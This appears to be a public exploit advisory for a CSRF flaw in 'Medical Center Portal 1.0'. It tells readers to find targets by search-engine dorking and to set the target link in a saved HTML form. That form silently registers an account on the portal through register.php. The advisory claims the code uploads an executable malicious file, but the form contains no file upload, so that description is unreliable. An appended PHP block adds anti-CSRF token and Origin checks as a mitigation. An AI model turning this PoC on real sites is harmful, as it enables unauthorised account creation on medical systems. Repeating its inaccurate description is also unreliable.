=============================================================================================================================================
| # Title     : Medical Center Portal 1.0 CSRF Vulnerability                                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip                                             |
=============================================================================================================================================

PoC:

[+] Dorking in Google or another search engine.

[+] The following HTML code uploads an executable malicious file remotely.

[+] Go to line 52.

[+] Set the target site link, save changes and apply.

[+] Save the code as poc.html.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Registration Form</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 20px;
            padding: 20px;
            max-width: 600px;
            background-color: #f4f4f4;
            border-radius: 8px;
        }
        .form-container {
            display: flex;
            flex-direction: column;
        }
        .form-group {
            margin-bottom: 15px;
        }
        .form-group label {
            font-weight: bold;
            margin-bottom: 5px;
            display: block;
        }
        .form-group input, .form-group select {
            padding: 8px;
            width: 100%;
            border: 1px solid #ccc;
            border-radius: 4px;
        }
        .form-group select {
            cursor: pointer;
        }
        .form-group button {
            padding: 10px 15px;
            background-color: #007bff;
            color: white;
            border: none;
            cursor: pointer;
            border-radius: 4px;
        }
        .form-group button:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <h2>Registration Form</h2>
    <form action="http://127.0.0.1/medic/pages/register.php?action=add" method="POST" class="form-container">
        <div class="form-group">
            <label for="firstname">First Name:</label>
            <input type="text" id="firstname" name="firstname" required>
        </div>
        <div class="form-group">
            <label for="nid">National ID (NID):</label>
            <input type="text" id="nid" name="nid" required>
        </div>
        <div class="form-group">
            <label for="gender">Gender:</label>
            <select id="gender" name="gender" required>
                <option value="">Select Gender</option>
                <option value="male">Male</option>
                <option value="female">Female</option>
            </select>
        </div>
        <div class="form-group">
            <label for="email">Email:</label>
            <input type="email" id="email" name="email" required>
        </div>
        <div class="form-group">
            <label for="phonenumber">Phone Number:</label>
            <input type="text" id="phonenumber" name="phonenumber" required>
        </div>
        <div class="form-group">
            <label for="jobs">Job:</label>
            <select id="jobs" name="jobs" required>
                <option value="">Select Job</option>
                <option value="doctor">Doctor</option>
                <option value="nurse">Nurse</option>
                <option value="pharmacist">Pharmacist</option>
            </select>
        </div>
        <div class="form-group">
            <label for="province">Province:</label>
            <select id="province" name="province" required>
                <option value="">Select Province</option>
                <option value="province1">Province 1</option>
                <option value="province2">Province 2</option>
                <option value="province3">Province 3</option>
            </select>
        </div>
        <div class="form-group">
            <label for="city">City:</label>
            <select id="city" name="city" required>
                <option value="">Select City</option>
                <option value="city1">City 1</option>
                <option value="city2">City 2</option>
                <option value="city3">City 3</option>
            </select>
        </div>
        <div class="form-group">
            <label for="username">Username:</label>
            <input type="text" id="username" name="username" required>
        </div>
        <div class="form-group">
            <label for="password">Password:</label>
            <input type="password" id="password" name="password" required>
        </div>
        <div class="form-group">
            <button type="submit">Register</button>
        </div>
    </form>
</body>
</html>
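
The form above carries no anti-CSRF token, so the request to register.php?action=add can be reproduced from any origin. As an added example (not part of the original advisory or the vendor's code), this is a session-bound synchronizer token plus Origin check that such a handler could enforce before writing to the database; the helper names, the `csrf_token` field name and the allowed origin are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; the allowed origin is an assumption for a local install.
const ALLOWED_ORIGINS = ['http://127.0.0.1'];

function csrf_start_session(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // SameSite=Lax: the session cookie is not attached to cross-site POSTs.
        session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
        session_start();
    }
}

// Returns the per-session token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to print inside the legitimate registration form.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES) . '">';
}

// Origin is checked when the browser sends it; the token is always required.
function csrf_request_ok(array $server, array $post, array $session): bool
{
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && !in_array($origin, ALLOWED_ORIGINS, true)) {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent); // constant-time comparison
}

// At the top of the state-changing handler, before any database write:
csrf_start_session();
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
    && !csrf_request_ok($_SERVER, $_POST, $_SESSION)) {
    http_response_code(403);
    exit('Invalid or missing CSRF token');
}
```

With this check in place, a POST from a page like poc.html is answered with 403, because a third-party page cannot read the token stored in the visitor's session.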


Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================